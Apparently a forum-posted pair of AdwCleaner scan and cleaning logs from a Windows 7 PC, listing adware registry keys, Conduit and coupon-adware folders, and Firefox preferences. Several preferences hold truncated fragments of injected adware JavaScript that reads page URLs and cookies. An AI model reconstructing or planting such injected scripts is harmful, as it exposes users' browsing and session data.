Key Found : HKLM\SOFTWARE\Classes\..9
Key Found : HKLM\SOFTWARE\Classes\AppID\{09C554C3-109B-483C-A06B-F14172F1A947}
Key Found : HKLM\SOFTWARE\Classes\AppID\{4CE516A7-F7AC-4628-B411-8F886DC5733E}
Key Found : HKLM\SOFTWARE\Classes\AppID\{4E1E9D45-8BF9-4139-915C-9F83CC3D5921}
Key Found : HKLM\SOFTWARE\Classes\AppID\{628F3201-34D0-49C0-BB9A-82A26AEFB291}
Key Found : HKLM\SOFTWARE\Classes\AppID\{B12E99ED-69BD-437C-86BE-C862B9E5444D}
Key Found : HKLM\SOFTWARE\Classes\AppID\{C292AD0A-C11F-479B-B8DB-743E72D283B0}
Key Found : HKLM\SOFTWARE\Classes\AppID\{D7EE8177-D51E-4F89-92B6-83EA2EC40800}
Key Found : HKLM\SOFTWARE\Classes\AppID\escort.DLL
Key Found : HKLM\SOFTWARE\Classes\AppID\escortApp.DLL
Key Found : HKLM\SOFTWARE\Classes\AppID\escortEng.DLL
Key Found : HKLM\SOFTWARE\Classes\AppID\escorTlbr.DLL
Key Found : HKLM\SOFTWARE\Classes\AppID\esrv.EXE
Key Found : HKLM\SOFTWARE\Classes\AppID\TbCommonUtils.DLL
Key Found : HKLM\SOFTWARE\Classes\AppID\TbHelper.EXE
Key Found : HKLM\SOFTWARE\Classes\CLSID\{0fd6c4b3-4875-4446-9ebc-e51179d7abe9}
Key Found : HKLM\SOFTWARE\Classes\CLSID\{1C950DE5-D31E-42FB-AFB9-91B0161633D8}
Key Found : HKLM\SOFTWARE\Classes\CLSID\{9F34B17E-FF0D-4FAB-97C4-9713FEE79052}
Key Found : HKLM\SOFTWARE\Classes\CLSID\{9F34B17E-FF0D-4FAB-97C4-9713FEE79052}
Key Found : HKLM\SOFTWARE\Classes\CLSID\{A9A56B8E-2DEB-4ED3-BC92-1FA450BCE1A5}
Key Found : HKLM\SOFTWARE\Classes\CLSID\{AE338F6D-5A7C-4D1D-86E3-C618532079B5}
Key Found : HKLM\SOFTWARE\Classes\CLSID\{B7FD68F7-D28B-431E-9EE8-E45D915B7F17}
Key Found : HKLM\SOFTWARE\Classes\CLSID\{BC7E25D7-4681-46A3-AF5A-9A1B865783ED}
Key Found : HKLM\SOFTWARE\Classes\CLSID\{C339D489-FABC-41DD-B39D-276101667C70}
Key Found : HKLM\SOFTWARE\Classes\CLSID\{C66A678D-5E6C-4AF9-8F57-C6192F42CF74}
Key Found : HKLM\SOFTWARE\Classes\CLSID\{CBBEA4B9-B183-47AC-8B1F-FD526AC99A8D}
Key Found : HKLM\SOFTWARE\Classes\CLSID\{D433A9D0-8267-40CB-8AD5-24F22FA5373F}
Key Found : HKLM\SOFTWARE\Classes\CLSID\{D433A9D0-8267-40CB-8AD5-24F22FA5373F}
Key Found : HKLM\SOFTWARE\Classes\CLSID\{D565B35E-B787-40FA-95E3-E3562F8FC1A0}
Key Found : HKLM\SOFTWARE\Classes\CLSID\{D565B35E-B787-40FA-95E3-E3562F8FC1A0}
Key Found : HKLM\SOFTWARE\Classes\CLSID\{D89031C2-10DA-4C90-9A62-FCED012BC46B}
Key Found : HKLM\SOFTWARE\Classes\CLSID\{E0C3A839-0E5E-4EBC-9F8F-E56F8FC732CE}
Key Found : HKLM\SOFTWARE\Classes\FromDocToPDF_65.PseudoTransparentPlugin
Key Found : HKLM\SOFTWARE\Classes\FromDocToPDF_65.PseudoTransparentPlugin.1
Key Found : HKLM\SOFTWARE\Classes\FromDocToPDF_65.Radio
Key Found : HKLM\SOFTWARE\Classes\FromDocToPDF_65.Radio.1
Key Found : HKLM\SOFTWARE\Classes\FromDocToPDF_65.SettingsPlugin
Key Found : HKLM\SOFTWARE\Classes\FromDocToPDF_65.SettingsPlugin.1
Key Found : HKLM\SOFTWARE\Classes\Interface\{2A42D13C-D427-4787-821B-CF6973855778}
Key Found : HKLM\SOFTWARE\Classes\Interface\{31E3BC75-2A09-4CFF-9C92-8D0ED8D1DC0F}
Key Found : HKLM\SOFTWARE\Classes\Interface\{36B445BF-1B84-466A-A623-A360A8CFF8C3}
Key Found : HKLM\SOFTWARE\Classes\Interface\{3D8478AA-7B88-48A9-8BCB-B85D594411EC}
Key Found : HKLM\SOFTWARE\Classes\Interface\{45CDA4F7-594C-49A0-AAD1-8224517FE979}
Key Found : HKLM\SOFTWARE\Classes\Interface\{4D8ED2B3-DC62-43EC-ABA3-5B74F046B1BE}
Key Found : HKLM\SOFTWARE\Classes\Interface\{6B458F62-592F-4B25-8967-E6A350A59328}
Key Found : HKLM\SOFTWARE\Classes\Interface\{6CBF5C01-C876-481B-867E-111CB1D2A7D6}
Key Found : HKLM\SOFTWARE\Classes\Interface\{81E852CC-1FD5-4004-8761-79A48B975E29}
Key Found : HKLM\SOFTWARE\Classes\Interface\{95B6A271-FEB4-4160-B0FF-44394C21C8DC}
Key Found : HKLM\SOFTWARE\Classes\Interface\{B2CA345D-ADB8-4F5D-AC64-4AB34322F659}
Key Found : HKLM\SOFTWARE\Classes\Interface\{B9F43021-60D4-42A6-A065-9BA37F38AC47}
Key Found : HKLM\SOFTWARE\Classes\Interface\{BF921DD3-732A-4A11-933B-A5EA49F2FD2C}
Key Found : HKLM\SOFTWARE\Classes\Interface\{C66F0B7A-BD67-4982-AF71-C6CA6E7F016F}
Key Found : HKLM\SOFTWARE\Classes\Interface\{D83B296A-2FA6-425B-8AE8-A1F33D99FBD6}
Key Found : HKLM\SOFTWARE\Classes\Interface\{E67D5BC7-7129-493E-9281-F47BDAFACE4F}
Key Found : HKLM\SOFTWARE\Classes\Interface\{EAF749DC-CD87-4B04-B22A-D4AC3FBCB2BC}
Key Found : HKLM\SOFTWARE\Classes\Interface\{FCC9CDD3-EFFF-11D1-A9F0-00A0244AC403}
Key Found : HKLM\SOFTWARE\Classes\TbHelper.TbDownloadManager
Key Found : HKLM\SOFTWARE\Classes\TbHelper.TbDownloadManager.1
Key Found : HKLM\SOFTWARE\Classes\TbHelper.TbPropertyManager
Key Found : HKLM\SOFTWARE\Classes\TbHelper.TbPropertyManager.1
Key Found : HKLM\SOFTWARE\Classes\TbHelper.TbRequest
Key Found : HKLM\SOFTWARE\Classes\TbHelper.TbRequest.1
Key Found : HKLM\SOFTWARE\Classes\TbHelper.TbTask
Key Found : HKLM\SOFTWARE\Classes\TbHelper.TbTask.1
Key Found : HKLM\SOFTWARE\Classes\TbHelper.ToolbarHelper
Key Found : HKLM\SOFTWARE\Classes\TbHelper.ToolbarHelper.1
Key Found : HKLM\SOFTWARE\Classes\Toolbar.CT3196716
Key Found : HKLM\SOFTWARE\Classes\Toolbar3.ContextMenuNotifier
Key Found : HKLM\SOFTWARE\Classes\Toolbar3.ContextMenuNotifier.1
Key Found : HKLM\SOFTWARE\Classes\Toolbar3.CustomInternetSecurityImpl
Key Found : HKLM\SOFTWARE\Classes\Toolbar3.CustomInternetSecurityImpl.1
Key Found : HKLM\SOFTWARE\Classes\Toolbar3.SearchProviderManager
Key Found : HKLM\SOFTWARE\Classes\Toolbar3.SearchProviderManager.1
Key Found : HKLM\SOFTWARE\Classes\TypeLib\{4E1E9D45-8BF9-4139-915C-9F83CC3D5921}
Key Found : HKLM\SOFTWARE\Classes\TypeLib\{74C02D12-FAEE-4834-80D2-5B7D2480AD61}
Key Found : HKLM\SOFTWARE\Classes\TypeLib\{D7EE8177-D51E-4F89-92B6-83EA2EC40800}
Key Found : HKLM\SOFTWARE\Classes\TypeLib\{E2343056-CC08-46AC-B898-BFC7ACF4E755}
Key Found : HKLM\SOFTWARE\Classes\TypeLib\{E3CDDB72-3ADC-4920-B42B-68A8C29FA942}
Key Found : HKLM\SOFTWARE\Conduit
Key Found : HKLM\SOFTWARE\InstallCore
Key Found : HKLM\SOFTWARE\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{36B445BF-1B84-466A-A623-

A360A8CFF8C3}
Key Found : HKLM\SOFTWARE\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{628F3201-34D0-49C0-BB9A-

82A26AEFB291}
Key Found : HKLM\SOFTWARE\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{6CBF5C01-C876-481B-867E-

111CB1D2A7D6}
Key Found : HKLM\SOFTWARE\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{701F5C41-BB30-46DA-A56B-

68784B0B762B}
Key Found : HKLM\SOFTWARE\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{A3B975A0-F679-444E-9D94-

6D292FA53140}
Key Found : HKLM\SOFTWARE\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{D97143C2-4282-496B-BDC4-

7EC852F1497C}
Key Found : HKLM\SOFTWARE\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{E0C3A839-0E5E-4EBC-9F8F-

E56F8FC732CE}
Key Found : HKLM\SOFTWARE\Microsoft\Internet Explorer\SearchScopes\{9a216821-0ec5-49a3-85ac-fb72ae79a1e8}
Key Found : HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Ext\PreApproved\{0fd6c4b3-4875-4446-9ebc-e51179d7abe9}
Key Found : HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Ext\PreApproved\{BC7E25D7-4681-46A3-AF5A-9A1B865783ED}
Key Found : HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Ext\PreApproved\{CBBEA4B9-B183-47AC-8B1F-FD526AC99A8D}
Key Found : HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{EE171732-BEB4-4576-887D-CB62727F01CA}
Key Found : HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\FromDocToPDF_65bar Uninstall Internet Explorer
Key Found : [x64] HKLM\SOFTWARE\Classes\Interface\{01221FCC-4BFB-461C-B08C-F6D2DF309921}
Key Found : [x64] HKLM\SOFTWARE\Classes\Interface\{0FA32667-9A8A-4E9C-902F-CA3323180003}
Key Found : [x64] HKLM\SOFTWARE\Classes\Interface\{2A42D13C-D427-4787-821B-CF6973855778}
Key Found : [x64] HKLM\SOFTWARE\Classes\Interface\{31E3BC75-2A09-4CFF-9C92-8D0ED8D1DC0F}
Key Found : [x64] HKLM\SOFTWARE\Classes\Interface\{36B445BF-1B84-466A-A623-A360A8CFF8C3}
Key Found : [x64] HKLM\SOFTWARE\Classes\Interface\{3D8478AA-7B88-48A9-8BCB-B85D594411EC}
Key Found : [x64] HKLM\SOFTWARE\Classes\Interface\{452AE416-9A97-44CA-93DA-D0F15C36254F}
Key Found : [x64] HKLM\SOFTWARE\Classes\Interface\{45CDA4F7-594C-49A0-AAD1-8224517FE979}
Key Found : [x64] HKLM\SOFTWARE\Classes\Interface\{4897BBA6-48D9-468C-8EFA-846275D7701B}
Key Found : [x64] HKLM\SOFTWARE\Classes\Interface\{4D8ED2B3-DC62-43EC-ABA3-5B74F046B1BE}
Key Found : [x64] HKLM\SOFTWARE\Classes\Interface\{6B458F62-592F-4B25-8967-E6A350A59328}
Key Found : [x64] HKLM\SOFTWARE\Classes\Interface\{6CBF5C01-C876-481B-867E-111CB1D2A7D6}
Key Found : [x64] HKLM\SOFTWARE\Classes\Interface\{81E852CC-1FD5-4004-8761-79A48B975E29}
Key Found : [x64] HKLM\SOFTWARE\Classes\Interface\{95B6A271-FEB4-4160-B0FF-44394C21C8DC}
Key Found : [x64] HKLM\SOFTWARE\Classes\Interface\{B2CA345D-ADB8-4F5D-AC64-4AB34322F659}
Key Found : [x64] HKLM\SOFTWARE\Classes\Interface\{B9F43021-60D4-42A6-A065-9BA37F38AC47}
Key Found : [x64] HKLM\SOFTWARE\Classes\Interface\{BF921DD3-732A-4A11-933B-A5EA49F2FD2C}
Key Found : [x64] HKLM\SOFTWARE\Classes\Interface\{C66F0B7A-BD67-4982-AF71-C6CA6E7F016F}
Key Found : [x64] HKLM\SOFTWARE\Classes\Interface\{D83B296A-2FA6-425B-8AE8-A1F33D99FBD6}
Key Found : [x64] HKLM\SOFTWARE\Classes\Interface\{D97143C2-4282-496B-BDC4-7EC852F1497C}
Key Found : [x64] HKLM\SOFTWARE\Classes\Interface\{E67D5BC7-7129-493E-9281-F47BDAFACE4F}
Key Found : [x64] HKLM\SOFTWARE\Classes\Interface\{EAF749DC-CD87-4B04-B22A-D4AC3FBCB2BC}
Key Found : [x64] HKLM\SOFTWARE\Classes\Interface\{FCC9CDD3-EFFF-11D1-A9F0-00A0244AC403}
Key Found : [x64] HKLM\SOFTWARE\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{A5AA24EA-11B8-4113-95AE-

9ED71DEAF12A}
Value Found : HKLM\SOFTWARE\Microsoft\Internet Explorer\Toolbar [{C66A678D-5E6C-4AF9-8F57-C6192F42CF74}]

***** [ Browsers ] *****

-\\ Internet Explorer v11.0.9600.17496


-\\ Mozilla Firefox v35.0 (x86 en-US)

[7rgneeol.default] - Line Found : user_pref("extensions.FXNqB.scode", "try{(function(){try{var url=

(window.self.location.href + document.cookie);if(url.indexOf(\"acebook\")>-1||url.indexOf(\"warnalert11.com\")>-

1||url.indexOf(\"sumoro[...]
[7rgneeol.default] - Line Found : user_pref("extensions.VDIQKPIG4.scode", "try{(function(){try{var url=

(window.self.location.href + document.cookie);if(url.indexOf(\"acebook\")>-1||url.indexOf(\"warnalert11.com\")>-

1||url.indexOf(\"su[...]
[7rgneeol.default] - Line Found : user_pref("extensions.irmysearch.aflt", "dsites");
[7rgneeol.default] - Line Found : user_pref("extensions.irmysearch.cd",

"2XzuyEtN2Y1L1QzutAzzyCtDyByByD0D0Fzz0F0D0D0CyD0AtN0D0Tzu0SyBzyyDtN1L2XzutBtFtCyBtFtDtFtCtN1L1CzutDtBtCtC1V1PtN1L1G

1B1V1N2Y1L1Qzu2SyEtDyEyCyE0FyByBtGyB0CtAtBtGtDt[...]
[7rgneeol.default] - Line Found : user_pref("extensions.irmysearch.cr", "1308762248");
[7rgneeol.default] - Line Found : user_pref("extensions.irmysearch.instlRef", "0211_e");
[7rgneeol.default] - Line Found : user_pref("extensions.q5lnQceM.scode", "try{(function(){try{var url=

(window.self.location.href + document.cookie);if(url.indexOf(\"acebook\")>-1||url.indexOf(\"warnalert11.com\")>-

1||url.indexOf(\"sum[...]
[7rgneeol.default] - Line Found : user_pref("extensions.uAk3as.scode", "try{(function(){try{var url=

(window.self.location.href + document.cookie);if(url.indexOf(\"acebook\")>-1||url.indexOf(\"warnalert11.com\")>-

1||url.indexOf(\"sumor[...]
[7rgneeol.default] - Line Found : user_pref("valueApps.CT0000000./9B+7E+x305.storedInFile", true);
[7rgneeol.default] - Line Found : user_pref("valueApps.CT0000000./9B+7E,x305.storedInFile", true);
[7rgneeol.default] - Line Found : user_pref("valueApps.CT0000000./9B+7E-x305.storedInFile", true);
[7rgneeol.default] - Line Found : user_pref("valueApps.CT0000000./9B+7E.:2z527", "2423");
[7rgneeol.default] - Line Found : user_pref("valueApps.CT0000000./9B+7E.:2z527.storedInFile", true);
[7rgneeol.default] - Line Found : user_pref("valueApps.CT0000000./9B+7E.x305.storedInFile", true);
[7rgneeol.default] - Line Found : user_pref("valueApps.CT0000000./9B+7E/x305.storedInFile", true);
[7rgneeol.default] - Line Found : user_pref("valueApps.CT0000000./9B+7E06CG5EL8:", "6E6C716F6E6D74727375");
[7rgneeol.default] - Line Found : user_pref("valueApps.CT0000000./9B+7E06CG5EL8:.storedInFile", false);
[7rgneeol.default] - Line Found : user_pref("valueApps.CT0000000./9B+7E06CG5EL;8I:K",

"247E2D2F226A7472777574737A78797B242F4B49474F42357D5D5C3D");
[7rgneeol.default] - Line Found : user_pref("valueApps.CT0000000./9B+7E06CG5EL;8I:K.storedInFile", false);
[7rgneeol.default] - Line Found : user_pref("valueApps.CT0000000./9B+7E0x305.storedInFile", true);
[7rgneeol.default] - Line Found : user_pref("valueApps.CT0000000./9B+7E1x305.storedInFile", true);
[7rgneeol.default] - Line Found : user_pref("valueApps.CT0000000./9B+7E2x305.storedInFile", true);
[7rgneeol.default] - Line Found : user_pref("valueApps.CT0000000./9B+7E31;CJ7FK;KG#8QKEF)TIL.storedInFile", true);
[7rgneeol.default] - Line Found : user_pref("valueApps.CT0000000./9B+7E31;CJE9G=BNMLENFAFVFEG.YNQ.storedInFile",

true);
[7rgneeol.default] - Line Found : user_pref("valueApps.CT0000000./9B+7E31;CJG9KDG<DH??'FDP.storedInFile", true);
[7rgneeol.default] - Line Found : user_pref("valueApps.CT0000000./9B+7E3x305.storedInFile", true);
[7rgneeol.default] - Line Found : user_pref("valueApps.CT0000000./9B+7E4x305.storedInFile", true);
[7rgneeol.default] - Line Found : user_pref("valueApps.CT0000000./9B+7E5x305.storedInFile", true);
[7rgneeol.default] - Line Found : user_pref("valueApps.CT0000000./9B+7E6x305.storedInFile", true);
[7rgneeol.default] - Line Found : user_pref("valueApps.CT0000000./9B+7E7x305.storedInFile", true);
[7rgneeol.default] - Line Found : user_pref("valueApps.CT0000000./9B+7E8x305.storedInFile", true);
[7rgneeol.default] - Line Found : user_pref("valueApps.CT0000000./9B+7E9x305.storedInFile", true);
[7rgneeol.default] - Line Found : user_pref("valueApps.CT0000000./9B+7E:x305.storedInFile", true);
[7rgneeol.default] - Line Found : user_pref("valueApps.CT0000000./9B+7E;x305.storedInFile", true);
[7rgneeol.default] - Line Found : user_pref("valueApps.CT0000000./9B+7E<x305.storedInFile", true);
[7rgneeol.default] - Line Found : user_pref("valueApps.CT0000000./9B+7E=x305.storedInFile", true);
[7rgneeol.default] - Line Found : user_pref("valueApps.CT0000000./9B+7E>x305.storedInFile", true);
[7rgneeol.default] - Line Found : user_pref("valueApps.CT0000000./9B+7E?x305.storedInFile", true);
[7rgneeol.default] - Line Found : user_pref("valueApps.CT0000000./9B+7E@x305.storedInFile", true);
[7rgneeol.default] - Line Found : user_pref("valueApps.CT0000000./9B+7EAx305.storedInFile", true);
[7rgneeol.default] - Line Found : user_pref("valueApps.CT0000000./9B+7EBE3G=;D9N9=D",

"372C2D326975762E3A3C7B3A39434A494841434B265146492965504656496571734D334B57");
[7rgneeol.default] - Line Found : user_pref("valueApps.CT0000000./9B+7EBE3G=;D9N9=D.storedInFile", false);
[7rgneeol.default] - Line Found : user_pref("valueApps.CT0000000./9B+7EBx305.storedInFile", true);
[7rgneeol.default] - Line Found : user_pref("valueApps.CT0000000./9B+7ECx305.storedInFile", true);
[7rgneeol.default] - Line Found : user_pref("valueApps.CT0000000./9B+7EDx305.storedInFile", true);
[7rgneeol.default] - Line Found : user_pref("valueApps.CT0000000./9B+7Etx305.storedInFile", true);
[7rgneeol.default] - Line Found : user_pref("valueApps.CT0000000./9B-0?3G>D",

"3C6F3F40707040417A7045447B2049757A77257D4E7D212A5423212829282B2A282D2B2B");
[7rgneeol.default] - Line Found : user_pref("valueApps.CT0000000./9B-0?3G>D.storedInFile", false);
[7rgneeol.default] - Line Found : user_pref("valueApps.CT0000000./9B-0?3G@6:5;", "");
[7rgneeol.default] - Line Found : user_pref("valueApps.CT0000000./9B-0?3G@6:5;.storedInFile", false);
[7rgneeol.default] - Line Found : user_pref("valueApps.CT0000000./9B-0?3GFA7EF", "2B2E2C3D");
[7rgneeol.default] - Line Found : user_pref("valueApps.CT0000000./9B-0?3GFA7EF.storedInFile", false);
[7rgneeol.default] - Line Found : user_pref("valueApps.CT0000000./9B-3=3ECCJA=F>",

"247E333D2C452F4135276F292A212C393D44307832332A354448584C3A23282E2E3132333435363B466068576C5E6857705A6C60606B666856

3F73796F697861");
[7rgneeol.default] - Line Found : user_pref("valueApps.CT0000000./9B-3=3ECCJA=F>.storedInFile", false);
[7rgneeol.default] - Line Found : user_pref("valueApps.CT0000000./9B/>01=9A6K6<IM;KRIE@PDAWM", "6A696B7273747576");
[7rgneeol.default] - Line Found : user_pref("valueApps.CT0000000./9B/>01=9A6K6<IM;KRIE@PDAWM.storedInFile", false);
[7rgneeol.default] - Line Found : user_pref("valueApps.CT0000000./9B3=>@44I48?",

"372C2D3269757633423633414847203E3D474E4D4C45474F2A554A4D2D5858585E4B554E366352564F");
[7rgneeol.default] - Line Found : user_pref("valueApps.CT0000000./9B3=>@44I48?.storedInFile", false);
[7rgneeol.default] - Line Found : user_pref("valueApps.CT0000000./9B5BA==9CJAG",

"3A70706D6D6D726D7A7877777B7C754C4A777C2323");
[7rgneeol.default] - Line Found : user_pref("valueApps.CT0000000./9B5BA==9CJAG.storedInFile", false);
[7rgneeol.default] - Line Found : user_pref("valueApps.CT0000000./9B6B11G4C56B>F;P;ANR@P",

"6E6C716F6E6D7472746F747677");
[7rgneeol.default] - Line Found : user_pref("valueApps.CT0000000./9B6B11G4C56B>F;P;ANR@P.storedInFile", false);
[7rgneeol.default] - Line Found : user_pref("valueApps.CT0000000./9B90E@.3C;7B=?OFB>>RHIQS", "393F352F3E");
[7rgneeol.default] - Line Found : user_pref("valueApps.CT0000000./9B90E@.3C;7B=?OFB>>RHIQS.storedInFile", false);
[7rgneeol.default] - Line Found : user_pref("valueApps.CT0000000./9B9643G3/9E", "6A");
[7rgneeol.default] - Line Found : user_pref("valueApps.CT0000000./9B9643G3/9E.storedInFile", false);
[7rgneeol.default] - Line Found : user_pref("valueApps.CT0000000./9B;45>:BI9I7IE", "2B2E2C3D");
[7rgneeol.default] - Line Found : user_pref("valueApps.CT0000000./9B;45>:BI9I7IE.storedInFile", false);
[7rgneeol.default] - Line Found : user_pref("valueApps.CT0000000./9B<:222H64<", "393F352F3E");
[7rgneeol.default] - Line Found : user_pref("valueApps.CT0000000./9B<:222H64<.storedInFile", false);
[7rgneeol.default] - Line Found : user_pref("valueApps.CT0000000./9B<:222H64<L8DAJ",

"6D70706E7674717975702A7A78727C7E757C20");
[7rgneeol.default] - Line Found : user_pref("valueApps.CT0000000./9B<:222H64<L8DAJ.storedInFile", false);
[7rgneeol.default] - Line Found : user_pref("valueApps.CT0000000./9B=+03EH8H8J?:", "4443");
[7rgneeol.default] - Line Found : user_pref("valueApps.CT0000000./9B=+03EH8H8J?:.storedInFile", false);
[7rgneeol.default] - Line Found : user_pref("valueApps.CT0000000./9B?+E2A52D8",

"372C2D326975762E3A3C7B3A39434A494841434B2651464929655046566470727951555E5E52");
[7rgneeol.default] - Line Found : user_pref("valueApps.CT0000000./9B?+E2A52D8.storedInFile", false);
[7rgneeol.default] - Line Found : user_pref("valueApps.CT0000000./9B?B0D:8AJ62<H", "6D");
[7rgneeol.default] - Line Found : user_pref("valueApps.CT0000000./9B?B0D:8AJ62<H.storedInFile", false);
[7rgneeol.default] - Line Found : user_pref("valueApps.CT0000000./9BA@0<0BI6A7GN:6@L?", "6C");
[7rgneeol.default] - Line Found : user_pref("valueApps.CT0000000./9BA@0<0BI6A7GN:6@L?.storedInFile", false);
[7rgneeol.default] - Line Found : user_pref("valueApps.CT0000000.PG_ENABLE", "74727565");
[7rgneeol.default] - Line Found : user_pref("valueApps.CT0000000.PG_ENABLE.storedInFile", false);
[7rgneeol.default] - Line Found : user_pref("valueApps.CT0000000.SF_JUST_INSTALLED", "46414C5345");
[7rgneeol.default] - Line Found : user_pref("valueApps.CT0000000.SF_JUST_INSTALLED.storedInFile", false);
[7rgneeol.default] - Line Found : user_pref("valueApps.CT0000000.SF_STATUS", "454E41424C4544");
[7rgneeol.default] - Line Found : user_pref("valueApps.CT0000000.SF_STATUS.storedInFile", false);
[7rgneeol.default] - Line Found : user_pref("valueApps.CT0000000.SF_USER_ID",

"6369645F3237343230313432313130333435323735393833");
[7rgneeol.default] - Line Found : user_pref("valueApps.CT0000000.SF_USER_ID.storedInFile", false);
[7rgneeol.default] - Line Found : user_pref("valueApps.CT0000000.cb_experience_000", "36");
[7rgneeol.default] - Line Found : user_pref("valueApps.CT0000000.cb_experience_000.storedInFile", false);
[7rgneeol.default] - Line Found : user_pref("valueApps.CT0000000.cb_firstuse0100", "31");
[7rgneeol.default] - Line Found : user_pref("valueApps.CT0000000.cb_firstuse0100.storedInFile", false);
[7rgneeol.default] - Line Found : user_pref("valueApps.CT0000000.cb_user_id_000",

"43423738353534373436393337365F313339393637313639353835305F46697265666F78");
[7rgneeol.default] - Line Found : user_pref("valueApps.CT0000000.cb_user_id_000.storedInFile", false);
[7rgneeol.default] - Line Found : user_pref("valueApps.CT0000000.cbfirsttime",

"53756E2041707220323720323031342032313A31303A333620474D542D3036303020284D6F756E7461696E205374616E646172642054696D65

29");
[7rgneeol.default] - Line Found : user_pref("valueApps.CT0000000.cbfirsttime.storedInFile", false);
[7rgneeol.default] - Line Found : user_pref("valueApps.CT0000000.mam_gk_appStateReportTime",

"31343033353731343332333632");
[7rgneeol.default] - Line Found : user_pref("valueApps.CT0000000.mam_gk_appStateReportTime.storedInFile", false);
[7rgneeol.default] - Line Found : user_pref("valueApps.CT0000000.mam_gk_appsConfig.storedInFile", true);
[7rgneeol.default] - Line Found : user_pref("valueApps.CT0000000.mam_gk_appsDefaultEnabled", "6E756C6C");
[7rgneeol.default] - Line Found : user_pref("valueApps.CT0000000.mam_gk_appsDefaultEnabled.storedInFile", false);
[7rgneeol.default] - Line Found : user_pref("valueApps.CT0000000.mam_gk_calledSetupService", "31");
[7rgneeol.default] - Line Found : user_pref("valueApps.CT0000000.mam_gk_calledSetupService.storedInFile", false);
[7rgneeol.default] - Line Found : user_pref("valueApps.CT0000000.mam_gk_currentVersion", "312E31332E302E3137");
[7rgneeol.default] - Line Found : user_pref("valueApps.CT0000000.mam_gk_currentVersion.storedInFile", false);
[7rgneeol.default] - Line Found : user_pref("valueApps.CT0000000.mam_gk_first_time", "31");
[7rgneeol.default] - Line Found : user_pref("valueApps.CT0000000.mam_gk_first_time.storedInFile", false);
[7rgneeol.default] - Line Found : user_pref("valueApps.CT0000000.mam_gk_lastLoginTime",

"31343033353731343333373536");
[7rgneeol.default] - Line Found : user_pref("valueApps.CT0000000.mam_gk_lastLoginTime.storedInFile", false);
[7rgneeol.default] - Line Found : user_pref("valueApps.CT0000000.mam_gk_localization.storedInFile", true);
[7rgneeol.default] - Line Found : user_pref("valueApps.CT0000000.mam_gk_settings1.13.0.17.storedInFile", true);
[7rgneeol.default] - Line Found : user_pref("valueApps.CT0000000.mam_gk_showWelcomeGadget", "66616C7365");
[7rgneeol.default] - Line Found : user_pref("valueApps.CT0000000.mam_gk_showWelcomeGadget.storedInFile", false);
[7rgneeol.default] - Line Found : user_pref("valueApps.CT0000000.mam_gk_stamp", "313139395F30");
[7rgneeol.default] - Line Found : user_pref("valueApps.CT0000000.mam_gk_stamp.storedInFile", false);
[7rgneeol.default] - Line Found : user_pref("valueApps.CT0000000.mam_gk_userBornDate", "3230313430343238");
[7rgneeol.default] - Line Found : user_pref("valueApps.CT0000000.mam_gk_userBornDate.storedInFile", false);
[7rgneeol.default] - Line Found : user_pref("valueApps.CT0000000.mam_gk_userId",

"64333531636537372D623135652D343266622D396364332D633636653163363162376133");
[7rgneeol.default] - Line Found : user_pref("valueApps.CT0000000.mam_gk_userId.storedInFile", false);
[7rgneeol.default] - Line Found : user_pref("valueApps.CT0000000.mam_gk_user_approval_interacted", "");
[7rgneeol.default] - Line Found : user_pref("valueApps.CT0000000.mam_gk_user_approval_interacted.storedInFile",

false);
[7rgneeol.default] - Line Found : user_pref("valueApps.CT0000000.url_history0001.storedInFile", true);

*************************

AdwCleaner[R0].txt - [26023 octets] - [21/01/2015 23:27:28]

########## EOF - \AdwCleaner\AdwCleaner[R0].txt - [26084 octets] ##########


And AdwCleaner[S0].txt
----------------------
# AdwCleaner v4.108 - Report created 21/01/2015 at 23:30:54
# Updated 17/01/2015 by Xplode
# Database : 2015-01-22.2 [Live]
# Operating System : Windows 7 Home Premium Service Pack 1 (64 bits)
# Username : Admin - LAWRENCE2
# Running from : C:\Users\Admin\Desktop\AdwCleaner.exe
# Option : Clean

***** [ Services ] *****

  • Service Deleted : qknfd


***** [ Files / Folders ] *****

Folder Deleted : C:\ProgramData\caoupoNpEaK
Folder Deleted : C:\ProgramData\ClIckForSalie
Folder Deleted : C:\ProgramData\DiscounntLoCaatOr
Folder Deleted : C:\ProgramData\KinngCouupon
Folder Deleted : C:\ProgramData\PrinCECCoupon
Folder Deleted : C:\ProgramData\SalesMagnet
Folder Deleted : C:\ProgramData\SaoftiCoup
Folder Deleted : C:\ProgramData\saveron
Folder Deleted : C:\ProgramData\2fcd61ef531c55b0
Folder Deleted : C:\ProgramData\3444516970527741360
Folder Deleted : C:\Program Files (x86)\Conduit
Folder Deleted : C:\Program Files (x86)\Optimizer Pro
Folder Deleted : C:\Program Files (x86)\saveron
Folder Deleted : C:\Windows\SysWOW64\SearchProtect
Folder Deleted : C:\Program Files\Conduit
Folder Deleted : C:\Users\Bonnie\AppData\Local\Conduit
Folder Deleted : C:\Users\Bonnie\AppData\Local\iac
Folder Deleted : C:\Users\Bonnie\AppData\Local\NativeMessaging
Folder Deleted : C:\Users\Bonnie\AppData\LocalLow\Conduit
Folder Deleted : C:\Users\Bonnie\AppData\LocalLow\iac
Folder Deleted : C:\Users\Bonnie\AppData\LocalLow\Toolbar4
Folder Deleted : C:\Users\Bonnie\AppData\Roaming\DigitalSites
Folder Deleted : C:\Users\Bonnie\AppData\Roaming\ValueApps
Folder Deleted : C:\Users\Bonnie\Documents\Optimizer Pro
Folder Deleted : C:\Users\Bonnie\Documents\Updater
File Deleted : \END
File Deleted : C:\Users\Bonnie\AppData\Roaming\Mozilla\Firefox\Profiles\7rgneeol.default\user.js

***** [ Scheduled Tasks ] *****


***** [ Shortcuts ] *****


***** [ Registry ] *****

Key Deleted : HKLM\SOFTWARE\Classes\AppID\escort.DLL
Key Deleted : HKLM\SOFTWARE\Classes\AppID\escortApp.DLL
Key Deleted : HKLM\SOFTWARE\Classes\AppID\escortEng.DLL
